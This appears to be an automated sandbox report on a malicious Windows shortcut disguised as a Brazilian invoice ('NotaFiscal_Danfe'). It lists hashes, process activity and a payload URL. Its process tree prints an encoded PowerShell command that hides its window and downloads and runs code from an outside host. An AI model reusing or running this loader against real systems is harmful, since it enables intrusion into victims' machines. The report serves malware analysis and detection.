Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 20:53 UTC
Static task
static1
Behavioral task
behavioral1
Sample
NotaFiscal_Danfe_N43553454BR.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
NotaFiscal_Danfe_N43553454BR.lnk
Resource
win10v2004-20240802-en
General
-
Target
NotaFiscal_Danfe_N43553454BR.lnk
-
Size
2KB
-
MD5
c3996410f80fd3137feb0f42074c71ca
-
SHA1
2da7caa8372ddb9e6601a029ed3d2128b5263b08
-
SHA256
11718e47eee14d48ff490b5443e430607968f9a18d95272e72e128c0c97c6234
-
SHA512
a706a0cd9c1a0443476067221786518a46c614a91f0937f384c7e8068d2ed85ff05e243e964556b34fc4c363d7296d229a47db1a37e78382825cf4f37294cb78
Malware Config
Extracted
https://sepogy.epiain.com/v2/gl.php?aHR0cHM6Ly9zZXBvZ3kuZXBpYWluLmNvbS92Mnw2NDhR%
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2744 powershell.exe 2744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2744 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2640 wrote to memory of 2744 2640 cmd.exe 31 PID 2640 wrote to memory of 2744 2640 cmd.exe 31 PID 2640 wrote to memory of 2744 2640 cmd.exe 31 PID 2744 wrote to memory of 2576 2744 powershell.exe 32 PID 2744 wrote to memory of 2576 2744 powershell.exe 32 PID 2744 wrote to memory of 2576 2744 powershell.exe 32 PID 2576 wrote to memory of 3016 2576 csc.exe 33 PID 2576 wrote to memory of 3016 2576 csc.exe 33 PID 2576 wrote to memory of 3016 2576 csc.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\NotaFiscal_Danfe_N43553454BR.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en cAB5ADsAYQBkAGQALQBUAFkAcABFACAALQBuAGEATQBFACAAQQAgAC0ATQBlAE0AYgBFAHIARABFAGYAaQBuAEkAVABpAE8ATgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAG4AQQBNAEUAcwBwAGEAQwBlACAAQgA7AFsAYgAuAEEAXQA6ADoAUwBIAE8AdwBXAEkAbgBkAE8AVwAoACgAWwBTAFkAcwB0AGUAbQAuAEQASQBhAGcATgBPAHMAVABpAEMAcwAuAFAAcgBPAEMAZQBzAHMAXQA6ADoAZwBlAHQAQwBVAFIAUgBlAG4AVABQAHIATwBDAEUAcwBTACgAKQAgAHwAIABQAFMAKQAuAE0AYQBJAE4AdwBpAG4ARABvAHcAaABhAG4ARABMAGUALAAwACkAOwBJAGUAWAAoAE4AZQBXAC0ATwBiAGoAZQBDAHQAIABOAGUAVAAuAFcAZQBiAEMATABpAGUAbgBUACkALgBEAE8AdwBOAEwATwBhAEQAUwBUAHIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAGUAcABvAGcAeQAuAGUAcABpAGEAaQBuAC4AYwBvAG0ALwB2ADIALwBnAGwALgBwAGgAcAA/AGEASABSADAAYwBIAE0ANgBMAHkAOQB6AFoAWABCAHYAWgAzAGsAdQBaAFgAQgBwAFkAVwBsAHUATABtAE4AdgBiAFMAOQAyAE0AbgB3ADIATgBEAGgAUgAlACcAKQA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\orabdere.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4876.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4875.tmp"4⤵PID:3016
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD52272bf3fbe8396f5d7857c1d1bfcfd91
SHA18dfd912cb7a13b3849821f66b4b4f9ded7359b73
SHA2560a71415d4a404eeafa1015a35aeef09106e6bb7e83164a81181fffe7860c2087
SHA512a7e14ec8da5d50afb0a668511dc87233c71270c875a33e15f266b1b3dc27a0c8be1e656c6ff8d5f09932799a3a32a28bad9edc769fc618f759dc39e4779d88a2
-
Filesize
3KB
MD51a97587d8bcadd756967a8d69440e8a2
SHA1b39a5abcb8281119d0b82b9bd30814a463998681
SHA256838c02ec76fcadef201351a326c96cb8cd0cdbe87c0b30c9beedbad6ea0c68cf
SHA512141444319e5268fb8dc70116cbdeb47c5913680c5af8dee1bd0b049561684bed137c663c800e258be4304c3b84a345edcc3acc796298eba90ec88f5428f5a4e7
-
Filesize
7KB
MD5b1b57e1f54d073d9e6040c3d9ee8d48e
SHA1b200d3d9378e2c3fb0bd9640038412206c6eae21
SHA256d170fab5283b33d67d4644c3bf5c32758863271bf0377a3ed602dffe07947f04
SHA512260896d63892c4c71af0d87560e185549fc933971c5611ef83a2588ac25348e42b1376a2cf3cec44419d3288373bf3d86029344ed536602083bf3db1915e2c28
-
Filesize
652B
MD5640b2a30551bfe0d8ec7d66695c2b2dc
SHA1d4bd9ce277bf8b9608dc485f4e4edbd0acde65b3
SHA25645952cf0d1195f632811d0874f978f18703f9498a9d7343562299dcaf635fd0d
SHA5120e354fdfcc4989dc4539142c00ba3ede28bedc0a4481f9f79582e018b5c3fcbca3c182ff0d222488152503b90dd928c3401b073a759e085458939d043349aa7a
-
Filesize
187B
MD57b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA2566caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA5127322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize
309B
MD56fbf3893d649e4b2cad7ac875cdcee53
SHA1954dc1f600f078200b3c789c12f39c41c694d4af
SHA25604d393ef7424994cfa3ff6fb47158976da4a6b83ceb2ee8be03dde7a8a5baaee
SHA512b055a582f124987f0ac0df4b84efac18a7a8e511ba56017bc89050dc5c2ae535ffee2c0376ba5da0f23b3522ebf6c13e403d38961f9734d44f807edeee09e154